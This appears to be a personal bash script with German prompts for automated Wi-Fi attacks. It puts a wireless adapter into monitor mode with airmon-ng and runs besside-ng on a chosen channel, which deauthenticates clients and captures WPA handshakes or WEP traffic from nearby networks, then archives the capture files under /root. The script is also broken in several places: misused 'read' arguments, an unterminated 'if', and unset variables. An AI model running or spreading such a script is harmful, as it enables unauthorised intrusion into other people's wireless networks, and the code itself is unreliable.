#!/bin/bash
# wlan adapter
function_name () {
   echo "Parameter #1 is $1"
}
if [ $# -eq 0 ]
then
sudo airmon-ng
echo "wlanX (0,1,2,3...)?"
read $1
fi
sudo iwlist wlan$1 scan | grep Frequency | sort | uniq -c | sort -n
sudo airmon-ng start wlan$1 > /dev/null
nochmal=y
while [ "$nochmal" = y ]
do
if function_name () {
   echo "Parameter #1 is $1"
}
echo "Kanal (1-13)?"
read $2
mon=mon
sudo besside-ng wlan$adapter$mon -c $kanal -vv
echo "Nochmal (y/n)? "
read nochmal
if [ "$nochmal" = y ]
then echo "Once again..."
fi
done
echo "Monitor mode beenden (y/n)? "
read monitor
if [ "$monitor" = y ]
then sudo airmon-ng stop wlan$adapter$mon > /dev/null
echo Monitor mode stopped.
fi
echo "Dateien verschieben (y/n)? "
read move
if [ "$move" = y ]
then
now=$(date +"%d_%m_%Y---%H_%M_%S")
sudo mkdir /root/wyfi/archiv/$now &&
mv *.cap *.log /root/wyfi/archiv/$now
fi
echo "Servus..."
exit 0
